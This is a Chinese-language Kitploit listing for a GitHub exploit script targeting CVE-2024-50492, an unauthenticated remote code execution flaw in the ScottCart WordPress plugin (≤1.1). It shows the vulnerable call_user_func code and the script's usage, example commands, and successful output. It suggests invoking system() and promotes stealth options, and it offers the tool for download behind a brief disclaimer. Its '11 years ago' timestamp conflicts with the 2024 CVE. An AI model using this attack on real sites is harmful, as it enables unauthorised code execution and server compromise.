Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - 未认证远程代码执行 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-50492
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - 未认证远程代码执行

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE 漏洞利用

🔥 ScottCart <= 1.1 漏洞利用脚本 - 未认证远程代码执行
🧑‍💻 作者:Nxploit – Khaled Alenazi


📌 描述

WordPress 的 ScottCart 插件(版本 ≤ 1.1)存在 远程代码执行(RCE) 漏洞。
该漏洞允许未认证攻击者通过存在漏洞的 AJAX 端点,在服务器上执行任意 PHP 函数。

  • 插件:ScottCart ≤ 1.1
  • 漏洞类型:未认证函数注入 → RCE
  • CVE:CVE-2024-50492
  • CVSS 评分:9.8 - 严重(Critical)

🧠 工作原理

该插件注册了一个未受保护的 AJAX 操作:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

该操作会执行:

root@kitploit:~
call_user_func($_POST['function']);

从而允许攻击者调用任意已存在的 PHP 函数,例如:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← 如果修改版环境中存在

🚀 漏洞利用功能

  • ✅ 自动发送构造的 payload 以触发存在漏洞的端点
  • ✅ 允许通过参数覆盖函数
  • ✅ 默认 payload:phpinfo() 用于 PoC
  • ✅ 将输出保存到带时间戳的文件中(例如:results_2025-03-26_14-33-01.txt)
  • ✅ 支持自定义 User-Agent、错误处理及忽略 SSL,以实现隐蔽操作

🖥️ 使用方法

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Function to call (default: phpinfo)

💡 示例

🔍 默认行为(使用 phpinfo() 进行 PoC):

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 调用插件内部函数:

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 输出示例

root@kitploit:~
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:

PHP Version => 8.1.12
...

📁 并保存至:results_2025-03-26_14-33-01.txt


🛡️ 免责声明

此工具仅用于教育和授权测试目的。
请勿将其用于您不拥有或未经明确许可测试的系统。


💬 致谢

  • 💻 漏洞利用脚本作者:Nxploit – Khaled Alenazi
  • 🛡️ CVE 编号:CVE-2024-50492
下载工具